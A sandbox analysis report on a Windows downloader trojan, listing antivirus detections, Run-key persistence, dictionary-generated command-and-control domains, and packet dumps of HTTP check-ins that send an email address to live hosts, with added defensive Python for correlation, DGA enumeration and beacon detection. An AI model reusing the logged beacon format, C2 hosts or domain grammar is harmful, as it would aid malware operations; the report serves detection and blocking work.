Field | Value |
---|---|
Analysis Date | 2015-10-14 02:58:40 |
MD5 | 1c624878f8d1d6a778d36a1d67f566d0 |
SHA1 | 430873cf733e6ba7007865e421efdc4826b75de6 |
Static Details:
Field | Value |
---|---|
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit |
Section | .text md5: 86e5d5600e5581e4a72414bf6a8531ea sha1: abec6f632032f422729dae7bbe2beb7aedbcbaac size: 294912 |
Section | .rdata md5: 0b8b72b418e237bf5aea02bae1f2cb1e sha1: 33831d2edcaa8a8c8a4a68be4b04284e12e27337 size: 33280 |
Section | .data md5: 3dc0dc18ea52db24b627f1ac435c29ee sha1: a332ef0493eaf995efddc887ae071532ab5c339d size: 108544 |
Timestamp | 2014-10-30 09:47:09 |
Packer | Microsoft Visual C++ ?.? |
PEhash | 2c6b6ec2bd36db5d9a89a3fe4094fdb63e6ae665 |
IMPhash | 7ed1d92c42d61181d01ac4918a4da139 |

Type | Engine | Detection |
---|---|---|
AV | CA (E-Trust Ino) | no_virus |
AV | F-Secure | Gen:Variant.Symmi.22722 |
AV | Dr. Web | Trojan.DownLoader14.3653 |
AV | ClamAV | no_virus |
AV | Arcabit (arcavir) | Gen:Variant.Symmi.22722 |
AV | BullGuard | Gen:Variant.Symmi.22722 |
AV | Padvish | no_virus |
AV | VirusBlokAda (vba32) | no_virus |
AV | CAT (quickheal) | Trojan.Dynamer.AC3 |
AV | Trend Micro | TROJ_FORUCON.BMC |
AV | Kaspersky | Trojan.Win32.Generic |
AV | Zillya! | Trojan.Agent.Win32.546225 |
AV | Emsisoft | Gen:Variant.Symmi.22722 |
AV | Ikarus | Trojan.FBAccountLock |
AV | Frisk (f-prot) | no_virus |
AV | Authentium | W32/Wonton.B.gen!Eldorado |
AV | MalwareBytes | Trojan.Agent.Gen |
AV | MicroWorld (escan) | Gen:Variant.Symmi.22722 |
AV | Microsoft Security Essentials | TrojanSpy:Win32/Nivdort.BD |
AV | K7 | Trojan ( 004cb2771 ) |
AV | BitDefender | Gen:Variant.Symmi.22722 |
AV | Fortinet | W32/Agent.VNC!tr |
AV | Symantec | Downloader.Upatre!g15 |
AV | Grisoft (avg) | Win32/Cryptor |
AV | Eset (nod32) | Win32/Agent.VNC |
AV | Alwil (avast) | Downloader-TLD [Trj] |
AV | Ad-Aware | Gen:Variant.Symmi.22722 |
AV | Rising | no_virus |
AV | Twister | Trojan.Agent.VNC.yaeu |
AV | Avira (antivir) | TR/AD.Nivdort.M.34 |
AV | Mcafee | Trojan-FEMT!1C624878F8D1 |
Runtime Details:
Process
↳ C:\malware.exe
Action | Detail |
---|---|
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Secure Fax Receiver Gateway WLAN BranchCache Base ➝ C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.exe |
Creates File | C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.exe |
Creates Process | C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.exe |
Process
↳ C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.exe
Action | Detail |
---|---|
Creates File | C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.kvi |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\qxlucfa.exe |
Creates Process | WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.exe" |
Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.exe"
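The runtime rows above form one chain: the sample writes a copy of itself into a directory with a random name under the user's Application Data, registers that copy under HKCU\...\CurrentVersion\Run with a plausible-sounding value name ("Secure Fax Receiver Gateway WLAN BranchCache Base"), launches it, and the copy then launches itself again with a WATCHDOGPROC argument (by its name, a second instance that guards the first). The script below is an added example, not part of the sandbox's own tooling: it correlates those rows into a single persistence finding, together with the other files dropped into the same directory, which is the set an analyst would remove along with the Run value. The input is the report's rows copied verbatim; the field names in the result are my own.

```python
import ntpath
import re

# Constructed input: the runtime rows of the report above, one event per
# line as "kind | detail".  The Run-key row keeps the report's "➝" arrow.
RUNTIME_EVENTS = r"""
Process | C:\malware.exe
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Secure Fax Receiver Gateway WLAN BranchCache Base ➝ C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.exe
Creates File | C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.exe
Creates Process | C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.exe
Process | C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.exe
Creates File | C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.kvi
Creates File | \Device\Afd\Endpoint
Creates File | C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\qxlucfa.exe
Creates Process | WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\nsridjsltnebdgk\ipciyfupplv.exe"
"""


def parse_events(text):
    """Split 'kind | detail' rows into (kind, detail) tuples."""
    rows = []
    for line in text.strip().splitlines():
        kind, _, detail = line.partition(" | ")
        rows.append((kind.strip(), detail.strip()))
    return rows


def exe_from_command(cmd):
    """Executable path from a command line.  A quoted path wins, so
    'WATCHDOGPROC "C:\\...\\x.exe"' yields the .exe, not the launcher token;
    an unquoted path with spaces is taken up to its .exe extension."""
    m = re.search(r'"([^"]+\.exe)"', cmd, re.I) or re.match(r'(.*?\.exe)\b', cmd, re.I)
    return m.group(1) if m else cmd


def run_key_entries(events):
    """(value name, target path) for every value written under a Run key."""
    out = []
    for kind, detail in events:
        if kind != "Registry" or "➝" not in detail:
            continue
        key, _, target = detail.partition("➝")
        key, target = key.strip(), target.strip()
        if "\\currentversion\\run\\" in key.lower():
            out.append((key.rsplit("\\", 1)[1], target))
    return out


def persistence_chain(events):
    """For each Run-key target: did the sample drop it, does it live in the
    user profile, how many times was it launched (directly or via the
    watchdog), and which other dropped files share its directory."""
    created = [d for k, d in events if k == "Creates File"]
    launched = [exe_from_command(d) for k, d in events if k == "Creates Process"]
    watchdog = [exe_from_command(d) for k, d in events
                if k == "Creates Process" and d.startswith("WATCHDOGPROC")]
    findings = []
    for name, target in run_key_entries(events):
        t = target.lower()
        tdir = ntpath.dirname(t)
        findings.append({
            "value_name": name,
            "target": target,
            "dropped_by_sample": t in (c.lower() for c in created),
            "under_user_profile": bool(re.search(r"\\(application data|appdata)\\", t)),
            "launch_count": sum(1 for p in launched if p.lower() == t),
            "watchdog_relaunch": any(p.lower() == t for p in watchdog),
            "sibling_artifacts": [c for c in created
                                  if ntpath.dirname(c.lower()) == tdir and c.lower() != t],
        })
    return findings


if __name__ == "__main__":
    for finding in persistence_chain(parse_events(RUNTIME_EVENTS)):
        for key, value in finding.items():
            print(f"{key}: {value}")
```

The same correlation works on Sysmon or EDR telemetry once the rows are mapped to the same three kinds (file write, registry set, process create); the point is to treat the Run value, its target and the target's siblings as one finding rather than three unrelated events.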
Network Details:
Event | Detail |
---|---|
DNS | collegesister.net Type: A 98.139.135.129 |
DNS | collegelabor.net Type: A 173.254.12.103 |
DNS | middlesister.net Type: A 209.51.158.235 |
DNS | morningsilver.net Type: A 208.100.26.234 |
DNS | morningvalley.net Type: A 220.73.130.99 |
DNS | thinkdemand.net Type: A 184.168.221.43 |
DNS | collegesilver.net Type: A |
DNS | chiefsister.net Type: A |
DNS | chiefvalley.net Type: A |
DNS | collegevalley.net Type: A |
DNS | chieflabor.net Type: A |
DNS | oftensilver.net Type: A |
DNS | alonesilver.net Type: A |
DNS | oftensister.net Type: A |
DNS | alonesister.net Type: A |
DNS | oftenvalley.net Type: A |
DNS | alonevalley.net Type: A |
DNS | oftenlabor.net Type: A |
DNS | alonelabor.net Type: A |
DNS | middlesilver.net Type: A |
DNS | twelvesilver.net Type: A |
DNS | twelvesister.net Type: A |
DNS | middlevalley.net Type: A |
DNS | twelvevalley.net Type: A |
DNS | middlelabor.net Type: A |
DNS | twelvelabor.net Type: A |
DNS | rathersilver.net Type: A |
DNS | rathersister.net Type: A |
DNS | morningsister.net Type: A |
DNS | rathervalley.net Type: A |
DNS | ratherlabor.net Type: A |
DNS | morninglabor.net Type: A |
DNS | strangesilver.net Type: A |
DNS | historysilver.net Type: A |
DNS | strangesister.net Type: A |
DNS | historysister.net Type: A |
DNS | strangevalley.net Type: A |
DNS | historyvalley.net Type: A |
DNS | strangelabor.net Type: A |
DNS | historylabor.net Type: A |
DNS | amountsilver.net Type: A |
DNS | weathersilver.net Type: A |
DNS | amountsister.net Type: A |
DNS | weathersister.net Type: A |
DNS | amountvalley.net Type: A |
DNS | weathervalley.net Type: A |
DNS | amountlabor.net Type: A |
DNS | weatherlabor.net Type: A |
DNS | thicksilver.net Type: A |
DNS | classsilver.net Type: A |
DNS | thicksister.net Type: A |
DNS | classsister.net Type: A |
DNS | thickvalley.net Type: A |
DNS | classvalley.net Type: A |
DNS | thicklabor.net Type: A |
DNS | classlabor.net Type: A |
DNS | thinkbring.net Type: A |
DNS | presentbring.net Type: A |
DNS | thinklisten.net Type: A |
DNS | presentlisten.net Type: A |
DNS | presentdemand.net Type: A |
DNS | thinkshout.net Type: A |
DNS | presentshout.net Type: A |
DNS | chiefbring.net Type: A |
DNS | collegebring.net Type: A |
DNS | chieflisten.net Type: A |
DNS | collegelisten.net Type: A |
DNS | chiefdemand.net Type: A |
DNS | collegedemand.net Type: A |
DNS | chiefshout.net Type: A |
DNS | collegeshout.net Type: A |
DNS | oftenbring.net Type: A |
DNS | alonebring.net Type: A |
DNS | oftenlisten.net Type: A |
DNS | alonelisten.net Type: A |
DNS | oftendemand.net Type: A |
DNS | alonedemand.net Type: A |
DNS | oftenshout.net Type: A |
DNS | aloneshout.net Type: A |
DNS | middlebring.net Type: A |
DNS | twelvebring.net Type: A |
DNS | middlelisten.net Type: A |
DNS | twelvelisten.net Type: A |
DNS | middledemand.net Type: A |
DNS | twelvedemand.net Type: A |
HTTP GET | http://collegesister.net/index.php?email=scaty_c@yahoo.com&method=post&len User-Agent: |
HTTP GET | http://collegelabor.net/index.php?email=scaty_c@yahoo.com&method=post&len User-Agent: |
HTTP GET | http://middlesister.net/index.php?email=scaty_c@yahoo.com&method=post&len User-Agent: |
HTTP GET | http://morningsilver.net/index.php?email=scaty_c@yahoo.com&method=post&len User-Agent: |
HTTP GET | http://morningvalley.net/index.php?email=scaty_c@yahoo.com&method=post&len User-Agent: |
HTTP GET | http://thinkdemand.net/index.php?email=scaty_c@yahoo.com&method=post&len User-Agent: |
Flows TCP | 192.168.1.1:1031 ➝ 98.139.135.129:80 |
Flows TCP | 192.168.1.1:1032 ➝ 173.254.12.103:80 |
Flows TCP | 192.168.1.1:1033 ➝ 209.51.158.235:80 |
Flows TCP | 192.168.1.1:1034 ➝ 208.100.26.234:80 |
Flows TCP | 192.168.1.1:1035 ➝ 220.73.130.99:80 |
Flows TCP | 192.168.1.1:1036 ➝ 184.168.221.43:80 |
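Every queried name is two English words joined under .net, and only six of the 85 queries resolved. Two word lists combined pairwise is exactly what a dictionary-based DGA produces: the resolved names are the rendezvous points the operator had registered at analysis time, the rest are candidates that were not (yet) live. The script below is an added example, not from the report or its tooling: it infers the two word lists from the queried names alone by choosing, for each label, the split whose two halves are shared by the most other labels, then enumerates the full grammar so that the combinations not yet seen can be blocklisted ahead of registration. It assumes the observed queries cover the word lists; any word the sample did not get around to querying during the run is missed, and the real generator's lists may be longer than what one run reveals.

```python
from itertools import product

# Constructed from the DNS rows of the report: the six names that received
# an A record, and the 79 that did not.
RESOLVED = {
    "collegesister.net": "98.139.135.129", "collegelabor.net": "173.254.12.103",
    "middlesister.net": "209.51.158.235", "morningsilver.net": "208.100.26.234",
    "morningvalley.net": "220.73.130.99", "thinkdemand.net": "184.168.221.43",
}
UNRESOLVED = {w + ".net" for w in """
collegesilver chiefsister chiefvalley collegevalley chieflabor oftensilver
alonesilver oftensister alonesister oftenvalley alonevalley oftenlabor alonelabor
middlesilver twelvesilver twelvesister middlevalley twelvevalley middlelabor
twelvelabor rathersilver rathersister morningsister rathervalley ratherlabor
morninglabor strangesilver historysilver strangesister historysister strangevalley
historyvalley strangelabor historylabor amountsilver weathersilver amountsister
weathersister amountvalley weathervalley amountlabor weatherlabor thicksilver
classsilver thicksister classsister thickvalley classvalley thicklabor classlabor
thinkbring presentbring thinklisten presentlisten presentdemand thinkshout
presentshout chiefbring collegebring chieflisten collegelisten chiefdemand
collegedemand chiefshout collegeshout oftenbring alonebring oftenlisten alonelisten
oftendemand alonedemand oftenshout aloneshout middlebring twelvebring middlelisten
twelvelisten middledemand twelvedemand
""".split()}
QUERIED = set(RESOLVED) | UNRESOLVED


def infer_wordlists(domains, min_support=2):
    """Split each second-level label into prefix+suffix, picking the split
    whose halves are each shared by the most other labels (max of the
    smaller count, product as tie-break).  Labels whose best split is not
    shared by at least min_support labels are skipped.  Assumes one label
    plus TLD, as in this report."""
    labels = [d.split(".")[0] for d in domains]
    prefixes, suffixes = set(), set()
    for lab in labels:
        best, best_score = None, (0, 0)
        for i in range(1, len(lab)):
            pre, suf = lab[:i], lab[i:]
            npre = sum(1 for x in labels if x.startswith(pre))
            nsuf = sum(1 for x in labels if x.endswith(suf))
            score = (min(npre, nsuf), npre * nsuf)
            if score > best_score:
                best, best_score = (pre, suf), score
        if best and best_score[0] >= min_support:
            prefixes.add(best[0])
            suffixes.add(best[1])
    return prefixes, suffixes


def candidate_domains(prefixes, suffixes, tld="net"):
    """Every prefix+suffix combination the inferred grammar can produce."""
    return {p + s + "." + tld for p, s in product(prefixes, suffixes)}


def dga_report(queried, resolved):
    """Word lists, grammar coverage, unseen candidates and live resolutions."""
    pre, suf = infer_wordlists(queried)
    cand = candidate_domains(pre, suf)
    return {
        "prefixes": sorted(pre),
        "suffixes": sorted(suf),
        "candidate_count": len(cand),
        "observed_in_grammar": len(set(queried) & cand),
        "unseen_candidates": sorted(cand - set(queried)),
        "live_c2": dict(sorted(resolved.items())),
    }


if __name__ == "__main__":
    r = dga_report(QUERIED, RESOLVED)
    print("prefixes:", " ".join(r["prefixes"]))
    print("suffixes:", " ".join(r["suffixes"]))
    print(f'{r["observed_in_grammar"]}/{r["candidate_count"]} grammar names observed; '
          f'{len(r["unseen_candidates"])} unseen, e.g. {r["unseen_candidates"][:3]}')
    for dom, ip in r["live_c2"].items():
        print("live:", dom, ip)
```

On this run the inference recovers 16 prefixes and 8 suffixes, so the grammar spans 128 names, of which 85 were queried and 43 were not. Block or sinkhole all 128, not just the six that resolved: the operator rotates registrations within the same grammar.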
Raw Pcap
0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e
0x00000010 (00016) 6d61696c 3d736361 74795f63 40796168 mail=scaty_c@yah
0x00000020 (00032) 6f6f2e63 6f6d266d 6574686f 643d706f oo.com&method=po
0x00000030 (00048) 7374266c 656e2048 5454502f 312e300d st&len HTTP/1.0.
0x00000040 (00064) 0a416363 6570743a 202a2f2a 0d0a436f .Accept: */*..Co
0x00000050 (00080) 6e6e6563 74696f6e 3a20636c 6f73650d nnection: close.
0x00000060 (00096) 0a486f73 743a2063 6f6c6c65 67657369 .Host: collegesi
0x00000070 (00112) 73746572 2e6e6574 0d0a0d0a ster.net....

0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e
0x00000010 (00016) 6d61696c 3d736361 74795f63 40796168 mail=scaty_c@yah
0x00000020 (00032) 6f6f2e63 6f6d266d 6574686f 643d706f oo.com&method=po
0x00000030 (00048) 7374266c 656e2048 5454502f 312e300d st&len HTTP/1.0.
0x00000040 (00064) 0a416363 6570743a 202a2f2a 0d0a436f .Accept: */*..Co
0x00000050 (00080) 6e6e6563 74696f6e 3a20636c 6f73650d nnection: close.
0x00000060 (00096) 0a486f73 743a2063 6f6c6c65 67656c61 .Host: collegela
0x00000070 (00112) 626f722e 6e65740d 0a0d0a0a bor.net.....

0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e
0x00000010 (00016) 6d61696c 3d736361 74795f63 40796168 mail=scaty_c@yah
0x00000020 (00032) 6f6f2e63 6f6d266d 6574686f 643d706f oo.com&method=po
0x00000030 (00048) 7374266c 656e2048 5454502f 312e300d st&len HTTP/1.0.
0x00000040 (00064) 0a416363 6570743a 202a2f2a 0d0a436f .Accept: */*..Co
0x00000050 (00080) 6e6e6563 74696f6e 3a20636c 6f73650d nnection: close.
0x00000060 (00096) 0a486f73 743a206d 6964646c 65736973 .Host: middlesis
0x00000070 (00112) 7465722e 6e65740d 0a0d0a0a ter.net.....

0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e
0x00000010 (00016) 6d61696c 3d736361 74795f63 40796168 mail=scaty_c@yah
0x00000020 (00032) 6f6f2e63 6f6d266d 6574686f 643d706f oo.com&method=po
0x00000030 (00048) 7374266c 656e2048 5454502f 312e300d st&len HTTP/1.0.
0x00000040 (00064) 0a416363 6570743a 202a2f2a 0d0a436f .Accept: */*..Co
0x00000050 (00080) 6e6e6563 74696f6e 3a20636c 6f73650d nnection: close.
0x00000060 (00096) 0a486f73 743a206d 6f726e69 6e677369 .Host: morningsi
0x00000070 (00112) 6c766572 2e6e6574 0d0a0d0a lver.net....

0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e
0x00000010 (00016) 6d61696c 3d736361 74795f63 40796168 mail=scaty_c@yah
0x00000020 (00032) 6f6f2e63 6f6d266d 6574686f 643d706f oo.com&method=po
0x00000030 (00048) 7374266c 656e2048 5454502f 312e300d st&len HTTP/1.0.
0x00000040 (00064) 0a416363 6570743a 202a2f2a 0d0a436f .Accept: */*..Co
0x00000050 (00080) 6e6e6563 74696f6e 3a20636c 6f73650d nnection: close.
0x00000060 (00096) 0a486f73 743a206d 6f726e69 6e677661 .Host: morningva
0x00000070 (00112) 6c6c6579 2e6e6574 0d0a0d0a lley.net....

0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e
0x00000010 (00016) 6d61696c 3d736361 74795f63 40796168 mail=scaty_c@yah
0x00000020 (00032) 6f6f2e63 6f6d266d 6574686f 643d706f oo.com&method=po
0x00000030 (00048) 7374266c 656e2048 5454502f 312e300d st&len HTTP/1.0.
0x00000040 (00064) 0a416363 6570743a 202a2f2a 0d0a436f .Accept: */*..Co
0x00000050 (00080) 6e6e6563 74696f6e 3a20636c 6f73650d nnection: close.
0x00000060 (00096) 0a486f73 743a2074 68696e6b 64656d61 .Host: thinkdema
0x00000070 (00112) 6e642e6e 65740d0a 0d0a0d0a nd.net......
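The dumps confirm what the HTTP GET rows summarise: an HTTP/1.0 GET for /index.php carrying an email address, method=post and a bare len parameter, with only Accept, Connection and Host headers and no User-Agent at all (which is why the User-Agent field in the rows above is empty). Those six traits together are a usable network signature. The script below is an added example, my code rather than the sandbox's: it reassembles requests from dump lines in this exact format, parses the request line and headers, and scores each request against the traits. The first two requests are copied from the dump; the benign request is constructed for contrast; the dump-line regex assumes the ASCII column never begins with a token that is itself eight hex digits (true for this report).

```python
import re
from urllib.parse import parse_qs, urlsplit

# Offset, byte count, then up to four 8-hex-digit groups; the trailing
# ASCII column is ignored.  The lookahead stops the last group from
# swallowing the start of the ASCII column.
HEXLINE = re.compile(r"^0x([0-9a-fA-F]{8}) \(\d+\) ((?:[0-9a-fA-F]{8} )*[0-9a-fA-F]{2,8})(?=\s|$)")

# Constructed input: the first two requests of the Raw Pcap block above.
RAW_PCAP = """
0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e
0x00000010 (00016) 6d61696c 3d736361 74795f63 40796168 mail=scaty_c@yah
0x00000020 (00032) 6f6f2e63 6f6d266d 6574686f 643d706f oo.com&method=po
0x00000030 (00048) 7374266c 656e2048 5454502f 312e300d st&len HTTP/1.0.
0x00000040 (00064) 0a416363 6570743a 202a2f2a 0d0a436f .Accept: */*..Co
0x00000050 (00080) 6e6e6563 74696f6e 3a20636c 6f73650d nnection: close.
0x00000060 (00096) 0a486f73 743a2063 6f6c6c65 67657369 .Host: collegesi
0x00000070 (00112) 73746572 2e6e6574 0d0a0d0a ster.net....
0x00000000 (00000) 47455420 2f696e64 65782e70 68703f65 GET /index.php?e
0x00000010 (00016) 6d61696c 3d736361 74795f63 40796168 mail=scaty_c@yah
0x00000020 (00032) 6f6f2e63 6f6d266d 6574686f 643d706f oo.com&method=po
0x00000030 (00048) 7374266c 656e2048 5454502f 312e300d st&len HTTP/1.0.
0x00000040 (00064) 0a416363 6570743a 202a2f2a 0d0a436f .Accept: */*..Co
0x00000050 (00080) 6e6e6563 74696f6e 3a20636c 6f73650d nnection: close.
0x00000060 (00096) 0a486f73 743a2063 6f6c6c65 67656c61 .Host: collegela
0x00000070 (00112) 626f722e 6e65740d 0a0d0a0a bor.net.....
"""

# Constructed for contrast: an ordinary browser request to the same path.
BENIGN_REQUEST = (b"GET /index.php?id=5 HTTP/1.1\r\nHost: example.com\r\n"
                  b"User-Agent: Mozilla/5.0\r\nAccept: */*\r\n\r\n")


def parse_hexdump(text):
    """Reassemble packets from dump lines; a line at offset 0 starts a new one."""
    packets, cur = [], bytearray()
    for line in text.splitlines():
        m = HEXLINE.match(line.strip())
        if not m:
            continue
        offset, groups = int(m.group(1), 16), m.group(2).split()
        if offset == 0 and cur:
            packets.append(bytes(cur))
            cur = bytearray()
        cur += bytes.fromhex("".join(groups))
    if cur:
        packets.append(bytes(cur))
    return packets


def parse_http_request(raw):
    """(method, target, version, headers) from raw request bytes; header
    names are lower-cased, anything after the blank line is ignored."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = (lines[0].split(" ", 2) + ["", "", ""])[:3]
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, version, headers


def beacon_indicators(raw):
    """Score a request against the traits of the check-in in the report and
    pull out the value being reported (the email address)."""
    method, target, version, headers = parse_http_request(raw)
    parts = urlsplit(target)
    qs = parse_qs(parts.query, keep_blank_values=True)
    traits = {
        "http_1_0": version == "HTTP/1.0",
        "no_user_agent": "user-agent" not in headers,
        "index_php": parts.path == "/index.php",
        "email_in_query": "email" in qs,
        "method_post_in_get": method == "GET" and qs.get("method") == ["post"],
        "bare_len": qs.get("len") == [""],
    }
    return {
        "host": headers.get("host"),
        "email": (qs.get("email") or [None])[0],
        "traits": traits,
        "score": sum(traits.values()),
    }


if __name__ == "__main__":
    for pkt in parse_hexdump(RAW_PCAP) + [BENIGN_REQUEST]:
        r = beacon_indicators(pkt)
        print(f'{r["host"]}: score {r["score"]}/6, email={r["email"]}')
```

A proxy or IDS rule built from the same traits should key on the absent User-Agent together with the email= and method=post query pair, not on the host names, which the DGA rotates.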
Strings